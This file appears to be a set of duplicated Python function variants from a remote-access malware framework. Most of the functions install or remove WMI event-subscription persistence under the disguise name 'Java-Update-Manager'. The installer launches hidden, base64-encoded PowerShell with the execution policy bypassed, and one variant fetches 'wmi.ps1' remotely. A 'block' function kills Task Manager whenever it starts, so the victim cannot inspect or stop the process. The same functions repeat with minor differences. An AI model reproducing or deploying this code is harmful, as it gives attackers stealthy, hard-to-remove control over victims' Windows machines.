def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
try:
if os.name == 'nt' and not methods['powershell_wmi'].established:
cmd_line = ""
value = sys.argv[0]
if value and os.path.isfile(value):
cmd_line = 'start /b /min {}'.format(value)
elif command:
cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(
base64.b64encode(bytes(command).encode('UTF-16LE')))
if cmd_line:
startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
powershell = util.remote_import('wmi.ps1').replace(
'[STARTUP]',
startup).replace('[COMMAND_LINE]',
cmd_line).replace('[NAME]', name)
util.powershell(powershell)
code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
result = util.powershell(code)
if name in result:
return (True, result)
except Exception as e:
util.debug('{} error: {}'.format(_add_powershell_wmi.func_name,
str(e)))
return (False, None)
def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
try:
global template_wmi
if os.name == 'nt' and not _methods['powershell_wmi'].established:
if command:
cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE')))
startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
script = template_wmi.substitute(STARTUP=startup, COMMAND_LINE=cmd_line, NAME=name)
_ = util.powershell(script)
code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
result = util.powershell(code)
if name in result:
return (True, result)
except Exception as e:
util.log('{} error: {}'.format(_add_powershell_wmi.__name__, str(e)))
return (False, None)
def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
try:
global template_wmi
if os.name == 'nt' and not _methods['powershell_wmi'].established:
if command:
cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE')))
startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
script = template_wmi.substitute(STARTUP=startup, COMMAND_LINE=cmd_line, NAME=name)
_ = util.powershell(script)
code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
result = util.powershell(code)
if name in result:
return (True, result)
except Exception as e:
util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
return (False, None)
def block(process_name='taskmgr.exe'):
"""
Block a process from running by immediately killing it every time it spawns
`Optional`
:param str process_name: process name to block (default: taskmgr.exe)
"""
global template_block
try:
code = template_block.substitute(PROCESS=process_name)
_ = util.powershell(code)
return "Process {} blocked".format(process_name)
except Exception as e:
util.log("{} error: {}".format(block.func_name, str(e)))
def block(process_name='taskmgr.exe'):
"""
Block a process from running by immediately killing it every time it spawns
`Optional`
:param str process_name: process name to block (default: taskmgr.exe)
"""
global template_block
try:
code = template_block.substitute(PROCESS=process_name)
_ = util.powershell(code)
return "Process {} blocked".format(process_name)
except Exception as e:
util.log("{} error: {}".format(block.__name__, str(e)))
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'):
try:
if _methods['powershell_wmi'].established:
try:
code = r"""
Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject
Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name)
result = util.powershell(code)
if not result:
return (False, None)
except: pass
return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
except Exception as e:
util.log('{} error: {}'.format(_add_powershell_wmi.__name__, str(e)))
return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'):
try:
if _methods['powershell_wmi'].established:
try:
code = r"""
Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject
Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name)
result = util.powershell(code)
if not result:
return (False, None)
except: pass
return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
except Exception as e:
util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
def remove_powershell_wmi(task_name='Java-Update-Manager'):
try:
if methods['powershell_wmi'].get('established'):
try:
code = """
Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject
Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace(
'[NAME]', task_name)
result = util.powershell(code)
if not result:
return (False, None)
except:
pass
return (methods['powershell_wmi']['established'],
methods['powershell_wmi']['result'])
except Exception as e:
util.debug('{} error: {}'.format(add_powershell_wmi.func_name, str(e)))
return (methods['powershell_wmi']['established'],
methods['powershell_wmi']['result'])
